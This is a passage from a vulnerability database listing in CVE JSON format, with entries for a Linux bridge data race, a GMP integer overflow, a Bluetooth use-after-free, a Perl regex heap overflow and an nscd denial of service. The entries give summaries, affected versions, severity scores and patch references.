nf_hook_bridge_pre net/bridge/br_input.c:272 [inline]
br_handle_frame+0x4c9/0x940 net/bridge/br_input.c:417
__netif_receive_skb_core+0xa8a/0x21e0 net/core/dev.c:5417
__netif_receive_skb_one_core net/core/dev.c:5521 [inline]
__netif_receive_skb+0x57/0x1b0 net/core/dev.c:5637
process_backlog+0x21f/0x380 net/core/dev.c:5965
__napi_poll+0x60/0x3b0 net/core/dev.c:6527
napi_poll net/core/dev.c:6594 [inline]
net_rx_action+0x32b/0x750 net/core/dev.c:6727
__do_softirq+0xc1/0x265 kernel/softirq.c:553
do_softirq+0x5e/0x90 kernel/softirq.c:454
__local_bh_enable_ip+0x64/0x70 kernel/softirq.c:381
__raw_spin_unlock_bh include/linux/spinlock_api_smp.h:167 [inline]
_raw_spin_unlock_bh+0x36/0x40 kernel/locking/spinlock.c:210
spin_unlock_bh include/linux/spinlock.h:396 [inline]
batadv_tt_local_purge+0x1a8/0x1f0 net/batman-adv/translation-table.c:1356
batadv_tt_purge+0x2b/0x630 net/batman-adv/translation-table.c:3560
process_one_work kernel/workqueue.c:2630 [inline]
process_scheduled_works+0x5b8/0xa30 kernel/workqueue.c:2703
worker_thread+0x525/0x730 kernel/workqueue.c:2784
kthread+0x1d7/0x210 kernel/kthread.c:388
ret_from_fork+0x48/0x60 arch/x86/kernel/process.c:147
ret_from_fork_asm+0x11/0x20 arch/x86/entry/entry_64.S:304
value changed: 0x00000000000d7190 -> 0x00000000000d7191
Reported by Kernel Concurrency Sanitizer on:
CPU: 0 PID: 14848 Comm: kworker/u4:11 Not tainted 6.6.0-rc1-syzkaller-00236-gad8a69f361b9 #0
References
Impacted products
Vendor | Product | Version | |||||
---|---|---|---|---|---|---|---|
▼ | Linux | Linux |
Version: 1c29fc4989bc2a3838b2837adc12b8aeb0feeede Version: 1c29fc4989bc2a3838b2837adc12b8aeb0feeede Version: 1c29fc4989bc2a3838b2837adc12b8aeb0feeede Version: 1c29fc4989bc2a3838b2837adc12b8aeb0feeede Version: 1c29fc4989bc2a3838b2837adc12b8aeb0feeede Version: 1c29fc4989bc2a3838b2837adc12b8aeb0feeede Version: 1c29fc4989bc2a3838b2837adc12b8aeb0feeede |
||||
|
{ "containers": { "adp": [ { "metrics": [ { "other": { "content": { "id": "CVE-2023-52578", "options": [ { "Exploitation": "none" }, { "Automatable": "no" }, { "Technical Impact": "partial" } ], "role": "CISA Coordinator", "timestamp": "2024-03-04T19:38:46.923888Z", "version": "2.0.3" }, "type": "ssvc" } } ], "providerMetadata": { "dateUpdated": "2024-06-04T17:22:50.080Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" }, { "providerMetadata": { "dateUpdated": "2024-08-02T23:03:21.190Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/d2346e6beb699909ca455d9d20c4e577ce900839" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/ad8d39c7b437fcdab7208a6a56c093d222c008d5" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/04cc361f029c14dd067ad180525c7392334c9bfd" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/8bc97117b51d68d5cea8f5351cca2d8c4153f394" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/89f9f20b1cbd36d99d5a248a4bf8d11d4fd049a2" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/f2ef4cb4d418fa64fe73eb84d10cc5c0e52e00fa" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/44bdb313da57322c9b3c108eb66981c6ec6509f4" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "product": "Linux", "programFiles": [ "net/bridge/br_forward.c", "net/bridge/br_input.c" ], "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git", "vendor": "Linux", "versions": [ { "lessThan": "d2346e6beb699909ca455d9d20c4e577ce900839", "status": "affected", "version": "1c29fc4989bc2a3838b2837adc12b8aeb0feeede", "versionType": "git" }, { "lessThan": "ad8d39c7b437fcdab7208a6a56c093d222c008d5", "status": "affected", "version": "1c29fc4989bc2a3838b2837adc12b8aeb0feeede", "versionType": "git" }, { "lessThan": "04cc361f029c14dd067ad180525c7392334c9bfd", "status": "affected", "version": "1c29fc4989bc2a3838b2837adc12b8aeb0feeede", "versionType": "git" }, { "lessThan": "8bc97117b51d68d5cea8f5351cca2d8c4153f394", "status": "affected", "version": "1c29fc4989bc2a3838b2837adc12b8aeb0feeede", "versionType": "git" }, { "lessThan": "89f9f20b1cbd36d99d5a248a4bf8d11d4fd049a2", "status": "affected", "version": "1c29fc4989bc2a3838b2837adc12b8aeb0feeede", "versionType": "git" }, { "lessThan": "f2ef4cb4d418fa64fe73eb84d10cc5c0e52e00fa", "status": "affected", "version": "1c29fc4989bc2a3838b2837adc12b8aeb0feeede", "versionType": "git" }, { "lessThan": "44bdb313da57322c9b3c108eb66981c6ec6509f4", "status": "affected", "version": "1c29fc4989bc2a3838b2837adc12b8aeb0feeede", "versionType": "git" } ] }, { "defaultStatus": "affected", "product": "Linux", "programFiles": [ "net/bridge/br_forward.c", "net/bridge/br_input.c" ], "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git", "vendor": "Linux", "versions": [ { "status": "affected", "version": "2.6.17" }, { "lessThan": "2.6.17", "status": "unaffected", "version": "0", "versionType": "semver" }, { "lessThanOrEqual": "4.19.*", "status": "unaffected", "version": "4.19.296", "versionType": "semver" }, { "lessThanOrEqual": "5.4.*", "status": "unaffected", "version": "5.4.258", "versionType": "semver" }, { "lessThanOrEqual": "5.10.*", "status": "unaffected", "version": "5.10.198", "versionType": "semver" }, { "lessThanOrEqual": "5.15.*", "status": "unaffected", "version": "5.15.134", "versionType": "semver" }, { "lessThanOrEqual": "6.1.*", "status": "unaffected", "version": "6.1.56", "versionType": "semver" }, { "lessThanOrEqual": "6.5.*", "status": "unaffected", "version": "6.5.6", "versionType": "semver" }, { "lessThanOrEqual": "*", "status": "unaffected", "version": "6.6", "versionType": "original_commit_for_fix" } ] } ], "descriptions": [ { "lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: bridge: use DEV_STATS_INC()\n\nsyzbot/KCSAN reported data-races in br_handle_frame_finish() [1]\nThis function can run from multiple cpus without mutual exclusion.\n\nAdopt SMP safe DEV_STATS_INC() to update dev-\u003estats fields.\n\nHandles updates to dev-\u003estats.tx_dropped while we are at it.\n\n[1]\nBUG: KCSAN: data-race in br_handle_frame_finish / br_handle_frame_finish\n\nread-write to 0xffff8881374b2178 of 8 bytes by interrupt on cpu 1:\nbr_handle_frame_finish+0xd4f/0xef0 net/bridge/br_input.c:189\nbr_nf_hook_thresh+0x1ed/0x220\nbr_nf_pre_routing_finish_ipv6+0x50f/0x540\nNF_HOOK include/linux/netfilter.h:304 [inline]\nbr_nf_pre_routing_ipv6+0x1e3/0x2a0 net/bridge/br_netfilter_ipv6.c:178\nbr_nf_pre_routing+0x526/0xba0 net/bridge/br_netfilter_hooks.c:508\nnf_hook_entry_hookfn include/linux/netfilter.h:144 [inline]\nnf_hook_bridge_pre net/bridge/br_input.c:272 [inline]\nbr_handle_frame+0x4c9/0x940 net/bridge/br_input.c:417\n__netif_receive_skb_core+0xa8a/0x21e0 net/core/dev.c:5417\n__netif_receive_skb_one_core net/core/dev.c:5521 [inline]\n__netif_receive_skb+0x57/0x1b0 net/core/dev.c:5637\nprocess_backlog+0x21f/0x380 net/core/dev.c:5965\n__napi_poll+0x60/0x3b0 net/core/dev.c:6527\nnapi_poll net/core/dev.c:6594 [inline]\nnet_rx_action+0x32b/0x750 net/core/dev.c:6727\n__do_softirq+0xc1/0x265 kernel/softirq.c:553\nrun_ksoftirqd+0x17/0x20 kernel/softirq.c:921\nsmpboot_thread_fn+0x30a/0x4a0 kernel/smpboot.c:164\nkthread+0x1d7/0x210 kernel/kthread.c:388\nret_from_fork+0x48/0x60 arch/x86/kernel/process.c:147\nret_from_fork_asm+0x11/0x20 arch/x86/entry/entry_64.S:304\n\nread-write to 0xffff8881374b2178 of 8 bytes by interrupt on cpu 0:\nbr_handle_frame_finish+0xd4f/0xef0 net/bridge/br_input.c:189\nbr_nf_hook_thresh+0x1ed/0x220\nbr_nf_pre_routing_finish_ipv6+0x50f/0x540\nNF_HOOK include/linux/netfilter.h:304 [inline]\nbr_nf_pre_routing_ipv6+0x1e3/0x2a0 net/bridge/br_netfilter_ipv6.c:178\nbr_nf_pre_routing+0x526/0xba0 net/bridge/br_netfilter_hooks.c:508\nnf_hook_entry_hookfn include/linux/netfilter.h:144 [inline]\nnf_hook_bridge_pre net/bridge/br_input.c:272 [inline]\nbr_handle_frame+0x4c9/0x940 net/bridge/br_input.c:417\n__netif_receive_skb_core+0xa8a/0x21e0 net/core/dev.c:5417\n__netif_receive_skb_one_core net/core/dev.c:5521 [inline]\n__netif_receive_skb+0x57/0x1b0 net/core/dev.c:5637\nprocess_backlog+0x21f/0x380 net/core/dev.c:5965\n__napi_poll+0x60/0x3b0 net/core/dev.c:6527\nnapi_poll net/core/dev.c:6594 [inline]\nnet_rx_action+0x32b/0x750 net/core/dev.c:6727\n__do_softirq+0xc1/0x265 kernel/softirq.c:553\ndo_softirq+0x5e/0x90 kernel/softirq.c:454\n__local_bh_enable_ip+0x64/0x70 kernel/softirq.c:381\n__raw_spin_unlock_bh include/linux/spinlock_api_smp.h:167 [inline]\n_raw_spin_unlock_bh+0x36/0x40 kernel/locking/spinlock.c:210\nspin_unlock_bh include/linux/spinlock.h:396 [inline]\nbatadv_tt_local_purge+0x1a8/0x1f0 net/batman-adv/translation-table.c:1356\nbatadv_tt_purge+0x2b/0x630 net/batman-adv/translation-table.c:3560\nprocess_one_work kernel/workqueue.c:2630 [inline]\nprocess_scheduled_works+0x5b8/0xa30 kernel/workqueue.c:2703\nworker_thread+0x525/0x730 kernel/workqueue.c:2784\nkthread+0x1d7/0x210 kernel/kthread.c:388\nret_from_fork+0x48/0x60 arch/x86/kernel/process.c:147\nret_from_fork_asm+0x11/0x20 arch/x86/entry/entry_64.S:304\n\nvalue changed: 0x00000000000d7190 -\u003e 0x00000000000d7191\n\nReported by Kernel Concurrency Sanitizer on:\nCPU: 0 PID: 14848 Comm: kworker/u4:11 Not tainted 6.6.0-rc1-syzkaller-00236-gad8a69f361b9 #0" } ], "providerMetadata": { "dateUpdated": "2024-12-19T08:21:58.964Z", "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "shortName": "Linux" }, "references": [ { "url": "https://git.kernel.org/stable/c/d2346e6beb699909ca455d9d20c4e577ce900839" }, { "url": "https://git.kernel.org/stable/c/ad8d39c7b437fcdab7208a6a56c093d222c008d5" }, { "url": "https://git.kernel.org/stable/c/04cc361f029c14dd067ad180525c7392334c9bfd" }, { "url": "https://git.kernel.org/stable/c/8bc97117b51d68d5cea8f5351cca2d8c4153f394" }, { "url": "https://git.kernel.org/stable/c/89f9f20b1cbd36d99d5a248a4bf8d11d4fd049a2" }, { "url": "https://git.kernel.org/stable/c/f2ef4cb4d418fa64fe73eb84d10cc5c0e52e00fa" }, { "url": "https://git.kernel.org/stable/c/44bdb313da57322c9b3c108eb66981c6ec6509f4" } ], "title": "net: bridge: use DEV_STATS_INC()", "x_generator": { "engine": "bippy-5f407fcff5a0" } } }, "cveMetadata": { "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "assignerShortName": "Linux", "cveId": "CVE-2023-52578", "datePublished": "2024-03-02T21:59:45.921Z", "dateReserved": "2024-03-02T21:55:42.569Z", "dateUpdated": "2024-12-19T08:21:58.964Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2021-43618
Vulnerability from cvelistv5
Published
2021-11-15 00:00
Modified
2024-08-04 04:03
Severity ?
EPSS score ?
Summary
GNU Multiple Precision Arithmetic Library (GMP) through 6.2.1 has an mpz/inp_raw.c integer overflow and resultant buffer overflow via crafted input, leading to a segmentation fault on 32-bit platforms.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T04:03:08.577Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://gmplib.org/list-archives/gmp-bugs/2021-September/005077.html" }, { "tags": [ "x_transferred" ], "url": "https://bugs.debian.org/994405" }, { "tags": [ "x_transferred" ], "url": "https://gmplib.org/repo/gmp-6.2/rev/561a9c25298e" }, { "name": "[debian-lts-announce] 20211202 [SECURITY] [DLA 2837-1] gmp security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2021/12/msg00001.html" }, { "name": "[oss-security] 20221013 Re: sagemath denial of service with abort() in gmp: overflow in mpz type", "tags": [ "mailing-list", "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2022/10/13/3" }, { "name": "20221016 Re: over 2000 packages depend on abort()ing libgmp", "tags": [ "mailing-list", "x_transferred" ], "url": "http://seclists.org/fulldisclosure/2022/Oct/8" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20221111-0001/" }, { "name": "GLSA-202309-13", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://security.gentoo.org/glsa/202309-13" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "GNU Multiple Precision Arithmetic Library (GMP) through 6.2.1 has an mpz/inp_raw.c integer overflow and resultant buffer overflow via crafted input, leading to a segmentation fault on 32-bit platforms." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2023-09-29T14:06:22.071388", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "url": "https://gmplib.org/list-archives/gmp-bugs/2021-September/005077.html" }, { "url": "https://bugs.debian.org/994405" }, { "url": "https://gmplib.org/repo/gmp-6.2/rev/561a9c25298e" }, { "name": "[debian-lts-announce] 20211202 [SECURITY] [DLA 2837-1] gmp security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2021/12/msg00001.html" }, { "name": "[oss-security] 20221013 Re: sagemath denial of service with abort() in gmp: overflow in mpz type", "tags": [ "mailing-list" ], "url": "http://www.openwall.com/lists/oss-security/2022/10/13/3" }, { "name": "20221016 Re: over 2000 packages depend on abort()ing libgmp", "tags": [ "mailing-list" ], "url": "http://seclists.org/fulldisclosure/2022/Oct/8" }, { "url": "https://security.netapp.com/advisory/ntap-20221111-0001/" }, { "name": "GLSA-202309-13", "tags": [ "vendor-advisory" ], "url": "https://security.gentoo.org/glsa/202309-13" } ] } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2021-43618", "datePublished": "2021-11-15T00:00:00", "dateReserved": "2021-11-15T00:00:00", "dateUpdated": "2024-08-04T04:03:08.577Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-51779
Vulnerability from cvelistv5
Published
2023-12-25 00:00
Modified
2024-08-29 18:54
Severity ?
EPSS score ?
Summary
bt_sock_recvmsg in net/bluetooth/af_bluetooth.c in the Linux kernel through 6.6.8 has a use-after-free because of a bt_sock_ioctl race condition.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T22:48:11.289Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://github.com/torvalds/linux/commit/2e07e8348ea454615e268222ae3fc240421be768" }, { "name": "[debian-lts-announce] 20240625 [SECURITY] [DLA 3841-1] linux-5.10 security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00016.html" } ], "title": "CVE Program Container" }, { "affected": [ { "cpes": [ "cpe:2.3:o:linux:kernel:*:*:*:*:*:*:*:*" ], "defaultStatus": "unknown", "product": "kernel", "vendor": "linux", "versions": [ { "lessThan": "6.6.8", "status": "affected", "version": "0", "versionType": "custom" } ] } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "HIGH", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" } }, { "other": { "content": { "id": "CVE-2023-51779", "options": [ { "Exploitation": "none" }, { "Automatable": "no" }, { "Technical Impact": "total" } ], "role": "CISA Coordinator", "timestamp": "2024-03-05T17:06:18.646179Z", "version": "2.0.3" }, "type": "ssvc" } } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-416", "description": "CWE-416 Use After Free", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-08-29T18:54:00.210Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "bt_sock_recvmsg in net/bluetooth/af_bluetooth.c in the Linux kernel through 6.6.8 has a use-after-free because of a bt_sock_ioctl race condition." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2024-06-25T21:06:56.480871", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "url": "https://github.com/torvalds/linux/commit/2e07e8348ea454615e268222ae3fc240421be768" }, { "name": "[debian-lts-announce] 20240625 [SECURITY] [DLA 3841-1] linux-5.10 security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00016.html" } ] } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2023-51779", "datePublished": "2023-12-25T00:00:00", "dateReserved": "2023-12-25T00:00:00", "dateUpdated": "2024-08-29T18:54:00.210Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-47038
Vulnerability from cvelistv5
Published
2023-12-18 13:43
Modified
2024-11-27 20:34
Severity ?
EPSS score ?
Summary
A vulnerability was found in perl 5.30.0 through 5.38.0. This issue occurs when a crafted regular expression is compiled by perl, which can allow an attacker controlled byte buffer overflow in a heap allocated buffer.
References
▼ | URL | Tags |
---|---|---|
https://access.redhat.com/errata/RHSA-2024:2228 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:3128 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/security/cve/CVE-2023-47038 | vdb-entry, x_refsource_REDHAT | |
https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1056746 | ||
https://bugzilla.redhat.com/show_bug.cgi?id=2249523 | issue-tracking, x_refsource_REDHAT |
Impacted products
Vendor | Product | Version | |||||||||||||||||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
▼ |
Version: 5.30.0 ≤ Version: 5.36.0 ≤ Version: 5.38.0 ≤ |
||||||||||||||||||||||||||
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T21:01:22.214Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "RHSA-2024:2228", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:2228" }, { "name": "RHSA-2024:3128", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:3128" }, { "tags": [ "vdb-entry", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/security/cve/CVE-2023-47038" }, { "tags": [ "x_transferred" ], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1056746" }, { "name": "RHBZ#2249523", "tags": [ "issue-tracking", "x_refsource_REDHAT", "x_transferred" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2249523" }, { "tags": [ "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GNEEWAACXQCEEAKSG7XX2D5YDRWLCIZJ/" }, { "tags": [ "x_transferred" ], "url": "https://perldoc.perl.org/perl5382delta#CVE-2023-47038-Write-past-buffer-end-via-illegal-user-defined-Unicode-property" } ], "title": "CVE Program Container" }, { "metrics": [ { "other": { "content": { "id": "CVE-2023-47038", "options": [ { "Exploitation": "none" }, { "Automatable": "no" }, { "Technical Impact": "total" } ], "role": "CISA Coordinator", "timestamp": "2024-11-27T20:34:17.016514Z", "version": "2.0.3" }, "type": "ssvc" } } ], "providerMetadata": { "dateUpdated": "2024-11-27T20:34:37.926Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" } ], "cna": { "affected": [ { "collectionURL": "https://github.com/Perl/perl5", "defaultStatus": "unaffected", "packageName": "perl", "versions": [ { "lessThan": "5.34.3", "status": "affected", "version": "5.30.0", "versionType": "semver" }, { "lessThan": "5.36.3", "status": "affected", "version": "5.36.0", "versionType": "semver" }, { "lessThan": "5.38.2", "status": "affected", "version": "5.38.0", "versionType": "semver" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:8::appstream" ], "defaultStatus": "affected", "packageName": "perl:5.32", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "8100020240314121426.9fe1d287", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:9::appstream" ], "defaultStatus": "affected", "packageName": "perl", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "4:5.32.1-481.el9", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:6" ], "defaultStatus": "unaffected", "packageName": "perl", "product": "Red Hat Enterprise Linux 6", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:7" ], "defaultStatus": "unaffected", "packageName": "perl", "product": "Red Hat Enterprise Linux 7", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:8" ], "defaultStatus": "unaffected", "packageName": "perl", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:8" ], "defaultStatus": "affected", "packageName": "perl:5.30/perl", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat" } ], "datePublic": "2023-11-25T00:00:00+00:00", "descriptions": [ { "lang": "en", "value": "A vulnerability was found in perl 5.30.0 through 5.38.0. This issue occurs when a crafted regular expression is compiled by perl, which can allow an attacker controlled byte buffer overflow in a heap allocated buffer." } ], "metrics": [ { "other": { "content": { "namespace": "https://access.redhat.com/security/updates/classification/", "value": "Moderate" }, "type": "Red Hat severity rating" } }, { "cvssV3_1": { "attackComplexity": "HIGH", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "format": "CVSS" } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-122", "description": "Heap-based Buffer Overflow", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-11-23T03:31:40.627Z", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "name": "RHSA-2024:2228", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:2228" }, { "name": "RHSA-2024:3128", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:3128" }, { "tags": [ "vdb-entry", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/security/cve/CVE-2023-47038" }, { "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1056746" }, { "name": "RHBZ#2249523", "tags": [ "issue-tracking", "x_refsource_REDHAT" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2249523" } ], "timeline": [ { "lang": "en", "time": "2023-11-11T00:00:00+00:00", "value": "Reported to Red Hat." }, { "lang": "en", "time": "2023-11-25T00:00:00+00:00", "value": "Made public." } ], "title": "Perl: write past buffer end via illegal user-defined unicode property", "workarounds": [ { "lang": "en", "value": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability." } ], "x_redhatCweChain": "CWE-122: Heap-based Buffer Overflow" } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2023-47038", "datePublished": "2023-12-18T13:43:07.713Z", "dateReserved": "2023-10-30T13:58:15.255Z", "dateUpdated": "2024-11-27T20:34:37.926Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2024-33601
Vulnerability from cvelistv5
Published
2024-05-06 19:22
Modified
2024-08-02 02:36
Severity ?
EPSS score ?
Summary
nscd: netgroup cache may terminate daemon on memory allocation failure
The Name Service Cache Daemon's (nscd) netgroup cache uses xmalloc or
xrealloc and these functions may terminate the process due to a memory
allocation failure resulting in a denial of service to the clients. The
flaw was introduced in glibc 2.15 when the cache was added to nscd.
This vulnerability is only present in the nscd binary.
References
Impacted products
Vendor | Product | Version | |
---|---|---|---|
▼ | The GNU C Library | glibc |
Version: 2.15 < 2.40 |
|
{ "containers": { "adp": [ { "affected": [ { "cpes": [ "cpe:2.3:a:gnu:glibc:-:*:*:*:*:*:*:*" ], "defaultStatus": "unknown", "product": "glibc", "vendor": "gnu", "versions": [ { "lessThan": "2.40", "status": "affected", "version": "2.15", "versionType": "custom" } ] } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" } }, { "other": { "content": { "id": "CVE-2024-33601", "options": [ { "Exploitation": "none" }, { "Automatable": "yes" }, { "Technical Impact": "partial" } ], "role": "CISA Coordinator", "timestamp": "2024-05-09T17:26:01.322253Z", "version": "2.0.3" }, "type": "ssvc" } } ], "providerMetadata": { "dateUpdated": "2024-06-04T17:44:28.720Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" }, { "providerMetadata": { "dateUpdated": "2024-08-02T02:36:04.342Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://sourceware.org/git/?p=glibc.git;a=blob;f=advisories/GLIBC-SA-2024-0007" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20240524-0014/" }, { "tags": [ "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00026.html" }, { "tags": [ "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2024/07/22/5" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "product": "glibc", "vendor": "The GNU C Library", "versions": [ { "lessThan": "2.40", "status": "affected", "version": "2.15", "versionType": "custom" } ] } ], "descriptions": [ { "lang": "en", "supportingMedia": [ { "base64": false, "type": "text/html", "value": "\u003cdiv\u003enscd: netgroup cache may terminate daemon on memory allocation failure\u003cbr\u003e\u003cbr\u003eThe Name Service Cache Daemon\u0027s (nscd) netgroup cache uses xmalloc or\u003cbr\u003exrealloc and these functions may terminate the process due to a memory\u003cbr\u003eallocation failure resulting in a denial of service to the clients. The\u003cbr\u003eflaw was introduced in glibc 2.15 when the cache was added to nscd.\u003cbr\u003e\u003cbr\u003eThis vulnerability is only present in the nscd binary.\u003cbr\u003e\u003c/div\u003e" } ], "value": "nscd: netgroup cache may terminate daemon on memory allocation failure\n\nThe Name Service Cache Daemon\u0027s (nscd) netgroup cache uses xmalloc or\nxrealloc and these functions may terminate the process due to a memory\nallocation failure resulting in a denial of service to the clients. The\nflaw was introduced in glibc 2.15 